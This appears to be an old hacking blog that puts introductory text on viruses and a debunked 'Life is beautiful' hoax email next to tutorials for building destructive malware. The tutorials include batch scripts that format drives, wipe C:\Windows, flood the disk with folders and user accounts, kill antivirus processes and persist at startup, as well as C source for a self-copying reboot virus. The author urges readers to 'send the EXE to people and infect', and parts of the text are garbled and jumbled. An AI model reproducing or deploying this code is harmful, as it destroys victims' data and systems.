Monday, July 5, 2010
A computer virus is a computer program that can copy itself and infect a computerwithout the permission or knowledge of the
owner. The term "virus" is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs
that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable
code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or
carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive.Viruses can increase their chances of spreading to
other computers by infecting files on a network file system or a file system that is accessed by another computer. Viruses
A virus is a small piece of software that piggybacks on real programs. For example, a virus might attach itself to a program such as a spreadsheet program. Each time thespreadsheet program runs, the virus runs, too, and it has the chance to reproduce (by attaching to other programs) or wreak havoc.
E-Mail Viruses
An E-Mail virus could be a form of a macro virus that spreds itself to all the contact located in the hosts email address book, If any of the e-mail recipients open the attachment of the infected mail, It spreads to the new host's address book contacts, and then proceeds to send itself to all those contacts as well. These days, e-mail viruses van infect host even if the infected e-mail is previewed in a mail client. One of the most common and destructive e-mail viruses is the ILOVEYOU virus.
Boot Sector Viruses
A boot sector virus affects the boot sector of a hard disk, which is a very crucial part. The boot sector is where all information about the drive is stored, along with a program that makes it possible for the operating systems to boot up. By inserting its code into the boot sector, a virus guarantees that it loads into memory during every boot sequence.
A boot virus does not affect files; instead, it affects the disks that contain them. Perhaps this is the reason for their downfall. During the days when programs were carried around on floppies, the boot sector viruses used to spread like wildfire. However, with the CD-ROM revolution, it became impossible to infect per-written data on a CD, which eventually stopped such viruses from spreading.
Though boot viruses still exist, they are rare compared to new age malicious software. Another reason why they're not so prevalent is that operating systems today protect the boot sector, which makes it difficult for them to thrive.
Worms
A worm is a small piece of software that uses computer networks and security holes to replicate itself. A copy of the worm scans the network for another machine that has a specific security hole. It copies itself to the new machine using the security hole, and then starts replicating from there, as well.
How protect from these viruses ?
You can protect yourself against viruses with a few simple steps:
* If you are truly worried about traditional (as opposed to e-mail) viruses, you should be running a more secure operating system like UNIX. You never hear about viruses on these operating systems because the security features keep viruses (and unwanted human visitors) away from your hard disk.
* If you are using an unsecured operating system, then buying virus protection software is a nice safeguard.
* If you simply avoid programs from unknown sources (like the Internet), and instead stick with commercial software purchased on CDs, you eliminate almost all of the risk from traditional viruses. In addition, you should disable floppy disk booting -- most computers now allow you to do this, and that will eliminate the risk of a boot sector virus coming in from a floppy disk accidentally left in the drive.
* You should make sure that Macro Virus Protection is enabled in all Microsoft applications, and you should NEVER run macros in a document unless you know what they do. There is seldom a good reason to add macros to a document, so avoiding all macros is a great policy
Wednesday, June 16, 2010
If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can't be detected by any antivirus 2) Save As An EXE Any Name Will Do 3)Send the EXE to People And Infect 01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000 2) format d:\ /Q/X — this will format your dirve d:\ 01100110011011110111001001101101011000010111010000 100000011001000011101001011100 0010000000101111010100010010111101011000 3) format a:\ /Q/X — this will format your drive a:\ 01100110011011110111001001101101011000010111010000 100000011000010011101001011100 0010000000101111010100010010111101011000 4) del /F/S/Q c:\boot.ini — this will cause your computer not to boot. 01100100011001010110110000100000001011110100011000 101111010100110010111101010001 00100000011000110011101001011100011000100110111101 101111011101000010111001101001 0110111001101001 open notepad @Echo off save it as Dell.bat @echo off and save it as a .bat file This Virus will: 1. End Process, NAVAPSVC.exe title Hack Setup try one this @echo off save it as abcd.bat when ever u will run it it will be saved in ur start ups.. here t 5 means that ur comp will take5 secs to shut down u can make it 2 as well then it will be most dangerous thing to handle .. lol For more on virus making refer this links
Here are some good viruses ,i am not responsible for any kind of damage to your system ... :)
@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start
:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5
:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4
:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3
:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2
:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original
:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1
wat does it do : this is an extremely harmful virus the will keep replicating itself until your harddrive is totally full and will destroy ur comp.
1) Copy The Following In Notepad Exactly as it
01001011000111110010010101010101010000011111100000
1) format c:\ /Q/X — this will format your drive c:\
erase c:\windows
and save as
FINDOUTANAME.cmd
wat does it do:- will erase c:/windows ......Lol
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files...
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
echo:
echo:
echo:
echo Deleting Root Partition...
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x...
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1...
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall...
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes...
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c "Your computer has committed suicide. Have a nice day."
until continue you restart the computer:save on denger.bat and code written in notepad
@echo off
copy 0% denger.bat
start denger.bat
@echo off
shutdown -s -t 5 -c "Shutdown"
Del C:\ *.*|y
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown
Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q
then it is complete Save as any file you want in .bat format.. n enjoy lol..its really dangerous dont try on your own pc.
1) For this u can use the simple code below ..
@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
n den rest of the code ..
2) suppose u want to make a shutdown.bat a virus which will copy itself in start up n wenever comptuer starts it will shut down it in 2 secs..most dangerous kind of thing better to make create restore point before working with such files..
@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
shutdown -s -t 5 -c "Shutdown"
A computer virus is a computer program that can copy itself and infect a computerwithout the permission or knowledge of the
owner. The term "virus" is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs
that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable
code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or
carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive.Viruses can increase their chances of spreading to
other computers by infecting files on a network file system or a file system that is accessed by another computer. Viruses
A virus is a small piece of software that piggybacks on real programs. For example, a virus might attach itself to a program such as a spreadsheet program. Each time thespreadsheet program runs, the virus runs, too, and it has the chance to reproduce (by attaching to other programs) or wreak havoc.
E-Mail Viruses
An E-Mail virus could be a form of a macro virus that spreds itself to all the contact located in the hosts email address book, If any of the e-mail recipients open the attachment of the infected mail, It spreads to the new host's address book contacts, and then proceeds to send itself to all those contacts as well. These days, e-mail viruses van infect host even if the infected e-mail is previewed in a mail client. One of the most common and destructive e-mail viruses is the ILOVEYOU virus.
Boot Sector Viruses
A boot sector virus affects the boot sector of a hard disk, which is a very crucial part. The boot sector is where all information about the drive is stored, along with a program that makes it possible for the operating systems to boot up. By inserting its code into the boot sector, a virus guarantees that it loads into memory during every boot sequence.
A boot virus does not affect files; instead, it affects the disks that contain them. Perhaps this is the reason for their downfall. During the days when programs were carried around on floppies, the boot sector viruses used to spread like wildfire. However, with the CD-ROM revolution, it became impossible to infect per-written data on a CD, which eventually stopped such viruses from spreading.
Though boot viruses still exist, they are rare compared to new age malicious software. Another reason why they're not so prevalent is that operating systems today protect the boot sector, which makes it difficult for them to thrive.
Worms
A worm is a small piece of software that uses computer networks and security holes to replicate itself. A copy of the worm scans the network for another machine that has a specific security hole. It copies itself to the new machine using the security hole, and then starts replicating from there, as well.
How protect from these viruses ?
You can protect yourself against viruses with a few simple steps:
* If you are truly worried about traditional (as opposed to e-mail) viruses, you should be running a more secure operating system like UNIX. You never hear about viruses on these operating systems because the security features keep viruses (and unwanted human visitors) away from your hard disk.
* If you are using an unsecured operating system, then buying virus protection softwareis a nice safeguard.
* If you simply avoid programs from unknown sources (like the Internet), and instead stick with commercial software purchased on CDs, you eliminate almost all of the risk from traditional viruses. In addition, you should disable floppy disk booting -- most computers now allow you to do this, and that will eliminate the risk of a boot sector virus coming in from a floppy disk accidentally left in the drive.
* You should make sure that Macro Virus Protection is enabled in all Microsoft applications, and you should NEVER run macros in a document unless you know what they do. There is seldom a good reason to add macros to a document, so avoiding all macros is a great policy
Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded. For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect's this as a virus since I have coded this virus in C. So if you are familiar with C language then it's too easy to understand the logic behind the coding #include int found,drive_no;char buff[128]; void findroot() void main() case 2: case 3: case 4: default: while(fread(buff,1,1,self)>0) else NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR. Testing And Removing The Virus From Your PC 1. Reboot your computer in the SAFE MODE There, on the right site you will see an entry by name "sres".Delete this entry.That's it.You have removed this Virus successfully. The trick may be Risky so be careful while you use this trick on your own personal computer.
#include
#include
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst("C:\\windows\\system",&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst("C:\\windows\\system\\sysres.exe",&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst("D:\\windows\\system",&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst("D:\\windows\\system\\sysres.exe",&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst("E:\\windows\\system",&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst("E:\\windows\\system\\sysres.exe",&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst("F:\\windows\\system",&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst("F:\\windows\\system\\sysres.exe",&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],"rb"); //The virus file open's itself
switch(drive_no)
{
case 1:
target=fopen("C:\\windows\\system\\sysres.exe","wb"); //to place a copy of itself in a remote place
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe"); //put this file to registry for starup
break;
target=fopen("D:\\windows\\system\\sysres.exe","wb");
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe");
break;
target=fopen("E:\\windows\\system\\sysres.exe","wb");
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe");
break;
target=fopen("F:\\windows\\system\\sysres.exe","wb");
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe");
break;
exit(0);
}
fwrite(buff,1,1,target);
fcloseall();
}
system("shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}
You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.
2. Goto X:\Windows\System (X can be C,D,E or F)
3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate toHKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run
Strange but true, there are times when we decide to get rid of some virus or a worm by reformatting the system but even after formatting the PC we are shocked to see the virus back in our computers. This is what happened to my friend who formatted the PC just to get it cleaned but the problem was still there. I must confess that there is no better way than preventing the virus to enter the system, to protect our PC from viruses but there are viruses (rare but still there) that do not get removed even if we format our disk. It may also interest you to know that these viruses may also infect the BIOS and/or the boot sector. So if you feel that your BIOS is infectedthen only reflashing it is the option available. So these are the steps that you can do to ensure the removal of virus after format: 1. If you are just formatting the PC to delete the viruses then make sure to format the complete system and not a single suspected drive as most viruses come back from other drives. 2. While formatting the system through the Windows CD, perform "delete all partitions" to clear all data that contained the worm. 3. If this format still doesn't work (I don't think it would happen) then you should perform a Low Level Format on the disk that will surely erase everything stored on it. Any of the methods listed will surely solve your problem. So how did you like the tips? Then don't wait Subscribe, Explore and Comments on the posts on My Blog. Thanks for visiting and be a frequent visitor.
Tuesday, June 15, 2010
Hai all see this and read this and enjoy
This hoax started circulating in early 2002 and it has been passed around ever since. In spite of a great deal of online exposure, the hoax tends to resurge from time to time and its rate of circulation increases dramatically for a few months. As hoax emails go, this is one of the most "successful". Perhaps because of the apparent destructiveness of the "virus" and the urgent tone of the warning, people are apt to forward the message without much forethought. Like many other hoaxes, it capitalizes on the recipient's desire to help other Internet users by warning them of a perceived threat.
Symantec clarification about this Hoax
This hoax was first circulated in Portuguese. English, French, Italian and German versions have also been recorded.
English
URGENT! VIRUS!
This information arrived this morning, from Microsoft and Norton. Please send it to everybody you know who accesses the Internet.
You may receive an apparently harmless email with a PowerPoint presentation called "Life is beautiful.pps."
If you receive it DO NOT OPEN THE FILE UNDER ANY CIRCUMSTANCES, and delete it immediately.
If you open this file, a message will appear on your screen saying: "It is too late now, your life is no longer beautiful", subsequently you will LOSE EVERYTHING IN YOUR PC and the person who sent it to you will gain access to your name, email and password.
This is a new virus which started to circulate on Saturday afternoon. WE NEED TO DO EVERYTHING POSSIBLE TO STOP THIS VIRUS.
UOL has already confirmed its dangerousness, and the antivirus Softs are not capable of destroying it. The virus has been created by a hacker who calls himself "life owner", and who aims to destroying domestic PCs and who also fights Microsoft in court!
That’s why it comes disguised with extension pps. He fights in court for the Windows-XP patent.
MAKE A COPY OF THIS EMAIL TO ALL YOUR FRIENDS.
Chinese
This is an illustration of the Chinese version
French
ATTENTION !!!
Il y a un nouveau virus dans le réseau. L'information
vient de Microsoft et Norton. S'il vous plaît, transmettez à tous vos contacts. Vous pouvez recevoir un mail avec la présentation Power Point, intitulé : "La vie est belle.pps" ou "Life is beautiful.pps". Si vous le recevez NE L'OUVREZ PAS !! SUPPRIMEZ LE AUPLUS VITE. Si vous l'ouvrez, il apparaîtra sur votre écran un message : "maintenant il est tard, votre vie n'est plus belle". VOUS PERDREZ AUSSITÔT TOUT CE QUE VOUS AVEZ DANS VOTRE ORDINATEUR et la personne qui vous a envoyé ce mail aura accès à votre nom, e-mail et mot de passe. Il s'agit d'un nouveau virus qui a commencé à circuler samedi après-midi. NOUS DEVONS FAIRE NOTRE POSSIBLE POUR LE STOPPER. AOL en a déjà confirmé la dangerosité et les anti-virus ne sont pas capables de le détruire. Le virus a été créé par un hacker qui se prétend le maître du monde et souhaite détruire les PC domestiques. Il est en procès contre Microsoft pour la licence Windows XP.
ENVOYEZ CE MAIL A TOUS VOS CONTACTS
Merci
German
Viruswarnung
Die Information kommt von Microsoft und Norton. Bitte an alle Kontaktpersonen weiterleiten. Ihr könntet ein Mail mit einer Power Point Präsentation erhalten, welche mit "La vita è bella.pps" oder "Life is beautiful.pps" betitelt ist.
Wenn Ihr es kriegt - NICHT OEFFNEN ! SONDERN SOFORT LOESCHEN !! Wenn Ihr es doch öffnet, erscheint die Mitteilung "Adesso è tardi, la vostra vita non
è più bella" oder "Now it's too late, your life is not beautiful anymore".
Ihr verliert unverzüglich den gesamten Inhalt des PCs und der Absender hat Zugang zu Adresse, E-mail und Passwort. Es handelt sich um einen neuen Virus, der seit Samstag Nachmittag im Umlauf ist. Wir müssen da Mögliche unternehmen, um diesen Virus zu stoppen. AOL hat seine Gefährlichkeit bereits bestätigt und die Antivirus-Software ist noch nicht in der Lage, ihn zu zerstören.
Der Virus wurde von einem Hacker programmiert, der sich "Herr des Lebens" nennt (das muss aber nicht zwingend der Absender sein) und der sich vorgenommen hat, alle PCs zu zerstören. Angeblich befindet sich dieser Psychopath in einem Rechtsstreitmit Microsoft über das Patent zu Windows XP.
Italian
ATTENZIONE!!!
C'è UN NUOVO VIRUS nella rete. L'info viene da Microsoft e Norton. Per favore trasmettetela a tutti i vostri contatti. Potete ricevere una mail con na presentazione Power Point, intitolata "La vita è bella, pps" o "Life is beautiful, pps". Se la ricevete NON APRITELA!!!! CANCELLATELA AL PIU PRESTO!!!
Se l'aprite, apparirà sul vostro monitor un messaggio: "Adesso è tardi, la vostra vita non è più bella" SUBITO PERDERETE TUTTO QUELLO CHE AVETE NEL VOSTRO PC la persona che ve l'ha inviata avrà accesso al vostro nome, e-mail e pasword. Si tratta di un nuovo virus che ha incominciato
circolare sabato pomeriggio.
DOBBIAMO FARE IL POSSIBILE PER FERMARE QUEL VIRUS.
La AOL ne ha già confermato la pericolosità e i Soft antivirus non sono capaci di distruggerlo. Il virus è stato creato da un hacker che si autonomina il padrone della vita e pretende distruggere i pc domestici. E' in lotta legale contro la Microsoft per la patente Windows XP.
MANDA QUESTA MAIL A TUTTI I TUOI CONTATTI !!!!!
Portuguese:
URGENTE! VÍRUS!
Essa informação veio da Microsoft, e da Norton hoje pela manhã. Por favor, transmita-a para qualquer pessoa que você conhece e acessa a Internet.
Você pode receber e-mail de uma apresentação do Powerpoint aparentemente inofensivo, intitulado "A Vida é bela.pps". Se você recebê-lo NÃO ABRA O ARQUIVO SOB NENHUMA CIRCUNSTÂNCIA e delete-o imediatamente.
Se você abrir esse arquivo aparecerá a mensagem em seu monitor "Agora é tarde a sua vida não é mais bela" em seguida PERDERÁ TUDO QUE TIVER EM SEU PC e a pessoa que o enviou terá acesso ao seu nome, e-mail e password. Trata-se de um novo vírus que começou a circular sábado pela tarde.
PRECISAMOS FAZER TUDO QUE FOR POSSÍVEL PARA DETER ESSE VÍRUS.
A UOL já confirmou sua periculosidade e os Softs antivírus não estão aptos a destruí-lo. O Vírus foi criado por um hacker que se auto denomina de o dono da vida e tem em mente destruir pcs domésticos e luta contra a Microsoft na justiça! Por isso ele vem disfarçado com a extensão pps. Ele briga na justiça pela patente do Windows-XP
COPIE ESTE E-MAIL PARA TODOS OS SEUS AMIGOS
Spanish
VIRUS ULTRA PELIGROSO - FORMATO .PPS -
¡¡¡ATENCIÓN!!!
Hay un nuevo virus en el área!!!! La información viene de Microsoft y de Norton. Por favor, transmitirla a cualquier persona con acceso a Internet..
Usted puede recibir un mail en una presentación de Powerpoint aparentemente inofensiva, titulado "La vida es bella.pps"
Si usted lo recibe NO ABRA EL ARCHIVO BAJO NINGUNA CIRCUNSTANCIA y bórrelo inmediatamente. Si usted abre ese archivo aparecerá en su monitor un mensaje: "Ahora es tarde, su vida no es más bella", enseguida PERDERÁ TODO LO QUE TENGA EN SU PC y la persona que lo envió tendrá acceso a su nombre, e-mail y password. Se trata de un nuevo virus que comenzó a circular el sábado por la tarde.
NECESITAMOS HACER TODO LO POSIBLE PARA DETENER ESE VIRUS. La UOL ya confirmó su peligrosidad y los Softs antivirus no están aptos para destruirlo.
COPIE ESTE MAIL PARA TODOS SUS AMIGOS RECUERDA: SI LO ENVÍAS A TUS AMIGOS, NOS BENEFICIAS A TODOS.
Please ignore any messages regarding this hoax and do not pass on messages. Passing on messages about the hoax only serves to further propagate it.
Older versions of the hoax:
This information arrived this morning, from Microsoft and Norton. Please send it to everybody you know who accesses the Internet. You may receive an apparently harmless email with a PowerPoint presentation called "Life is beautiful.pps."
If you receive it DO NOT OPEN THE FILE UNDER ANY CIRCUMSTANCES, and delete it immediately. If you open this file, a message will appear on your screen saying: "It is too late now, your life is no longer beautiful", subsequently you will LOSE EVERYTHING IN YOUR PC and the person who sent it to you will gain access to your name, email and password. This is a new virus which started to circulate on Saturday afternoon. WE NEED TO DO EVERYTHING POSSIBLE TO STOP THIS VIRUS. UOL has already confirmed its dangerousness, and the antivirus Softs are not capable of destroying it. The virus has been created by a hacker who calls himself "life owner", and who aims to destroying domestic PCs and who also fights Microsoft in court! That's why it comes disguised with extension pps. He fights in court for the Windows- XP patent.
MAKE A COPY OF THIS EMAIL TO ALL YOUR FRIENDS
VERY IMPORTANT WARNING
Please Be Extremely Careful especially if using internet mail such as Yahoo, Hotmail, AOL and so on. This information arrived this morning direct from both Microsoft and Norton. Please send it to everybody you know who has access to the Internet.
You may receive an apparently harmless email with a Power Point presentation "Life is beautiful."
If you receive it DO NOT OPEN THE FILE UNDER ANY CIRCUMSTANCES, and delete it immediately. If you open this file, a message will appear on your screen saying: "It is too late now, your life is no longer beautiful." Subsequently you will LOSE EVERYTHING IN YOUR PC and the person who sent it to you will gain access to your name, e-mail and password. This is a new virus which started to circulate on Saturday afternoon. AOL has already confirmed the severity, and the antivirus software's are not capable of destroying it. The virus has been created by a hacker who calls himself "life owner."
PLEASE SEND A COPY OF THIS EMAIL TO ALL YOUR FRIENDS and ask them to PASS IT ON IMMEDIATELY.
Commentary:
This "warning" claims that a very destructive virus disguised as a Power Point Presentation called "Life is beautiful" is currently being distributed via email. However, there is not, nor has there ever been a virus like the one described in this message.
There are several variants of the hoax, including versions in Chinese, French, Spanish, Italian and several other languages. The message tries to add authority to its claims by mentioning high-profile companies such as Microsoft and AOL. Incidentally, Microsoft does not send out unsolicited virus warnings. Moreover, "Norton" is the name given to a range of security software products sold by Symantec Corp. Thus, information about virus threats is published by "Symantec", not "Norton". In this case, Symantec haspublished information about the "Life is beautiful" message - but only to denounce it as a hoax.
Regsvr.exe: Regsvr.exe is identified as a worm that was first detected around 2007-08. This worm is usually detected along with the Newfolder.exe. Similar to the Newfolder.exe, this worm also spreads with the help of pen drives. When the flash drive is inserted into the infected system, the regsvr.exe immediately creates a copy of itself in the USB and also an autorun.inf file with the help of which it can launch in the target's system. This virus is capable of editing the registry and autoexecuting itself at the system startup. It generally resides in the Windows/ system32 directory. However, it can be removed by scanning the pen drive using a good antivirus or simply opening the USB using theWindows Command Prompt. Using a good firewall is recommended to prevent viruses like this one. Anyway, here is a simple manual removal method to this virus. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
What's Microsoft's response to this?
SOURCE: [url down]
The World's Most Dangerous Virus
Date Published: Oct 21, 2003
Imagine if a computer virus emerged that secretly
attached itself to one of the most popular software
programs ever. Imagine if the largest media outlets
unwittingly praised this secret pairing, encouraging
millions of people to install it. Imagine if none of the
major antivirus programs would detect it. Imagine if once
installed, it could alter anything on your computer
without your consent or knowledge. Imagine if the virus
was at the control of a greedy entity that has repeatedly
trampled on consumers and smaller companies to advance
its corporate agenda. Imagine if it could force everyone
who wanted to communicate with you to also carry the
virus so it would insidiously spread person to person.
Sound like a scary sci-fi plot? It's not science fiction.
This week MO3 will be released on the world. Here's how
to detect it in your neighborhood and what you can do to
protect yourself:
The Trojan Horse
Press outlets will blanket the world with stories about
Microsoft Office 2003. Most articles will tout seemingly
innocuous features and feel good quotes from Microsoft
like "this is our most important product release ever."
Unfortunately the press won't talk about the dangerous
software buried inside this release - MO3. This code will
give Microsoft the ability to change anything on your
computer at anytime they wish with no notification to
you.
The Security Ploy
Post 9/11, few people question actions taken under the
guise of "improved security" and this is how MO3 will be
foisted onto computer users - as a feature to 'make you
safer.' Computer users have understandably tired of the
near daily worm and virus warnings, as well as the time-
consuming patch process due to Microsoft's lax software
standards and its focusing not on building secure
products, but products that secure its monopoly market
positions. To improve the predicament which they've
created, Microsoft is forcing consumers to accept MO3
embedded into every computer. Listen closely and you'll
hear Microsoft mouth pieces speak of "turning software
into a service" which really means they will be changing
the software on your computer whenever they feel like it.
They will slowly limit your ability to run non-Microsoft
software. They will restrict choices on your computer to
only those products they approve. They will make changes
which cripple other software programs or reduce their
ability to interoperate with your computer so you will be
forced to use exclusively Microsoft approved products.
History Repeats Itself
Microsoft may use this newfound power to fix some holes
in their software, but they will also abuse this power to
further their corporate monopoly and increase their
control and profits. Microsoft has already embedded the
MO3 virus into another operating system they have
deployed, called Xbox. They now have the power at anytime
to change all existing Xboxes which connect to the
Internet, and they are already misusing it. They have
deleted files from users' computers without their
knowledge or permission. They have added software which
has removed the ability to run competitor's software.
They have been changing users' systems without their
consent and notification. They will do the same on
Microsoft Windows based computers once MO3 is installed.
Microsoft management has shown to be deceitful and
dishonest and will continue this behavior. Twice
Microsoft has been found guilty by the Federal government
of using illegal tactics to drive competitors out of
business and extend their monopoly. December 1st, 2003 a
trial will take place in Seattle Washington where more of
Microsoft's past behaviors will come to light.
Infecting Friends
Microsoft Word (.doc) file open in StarOffice 7
To stop the advance of competing products and to force
users into purchasing new software with the MO3 virus,
Microsoft is making certain Microsoft Office 2003 files
unreadable by all older versions of Microsoft Office and
all competing office suites. Products like Sun's
StarOffice are getting extremely good at interoperating
with Microsoft word processing, presentation and
spreadsheet files making it possible for people to spend
close to $50 for an office suite instead of giving $400
or more to Microsoft. To blunt this and force users of
older versions of Microsoft Office to buy new software,
Microsoft has changed the specifications for some files.
Again under the umbrella of "security," Microsoft is
implementing features which limit who can open and edit
documents to further thwart competition. Microsoft Office
2003 gives its users the ability to control who can read
and edit certain documents, but only if they use the
latest Microsoft software. If one user within an office
uses this feature, all others will be unable to use any
other office suite to access that document. They will not
be permitted to run Linux software, they will be required
to purchase and run additional copies of Microsoft Office
2003. Since documents are frequently emailed around via
the Internet, this will force others to accept
Microsoft's software or be unable to communicate.
Microsoft refers to this as IRM for "information rights
management," but it's really an "infection relay method"
designed to force everyone to adopt MO3. They will be
using scare tactics about leaked memos or misdirected
emails to persuade unwitting computer users to deploy
this technology. Doing so will create a viral growth of
MO3 which will give MS unlimited power over every
computer.
Universal MO3
MO3 will not only come with Microsoft Office 2003, but
with future Microsoft products as well. The same
technology will be embedded into the next version of
Microsoft's operating system software so all users will
have to accept it with their new computer. Latest
estimates indicate this new software will not ship until
2006, so between now and then, watch for Microsoft to
secretly embed MO3 into updates or security patches that
they promote for their existing product line.
its a boot virus
#include
#include
#include
#include
#include
#include
using namespace std;
int random, Freq, Dur, X, Y;
HWND mywindow, TaskMgr, CMD, Regedit;
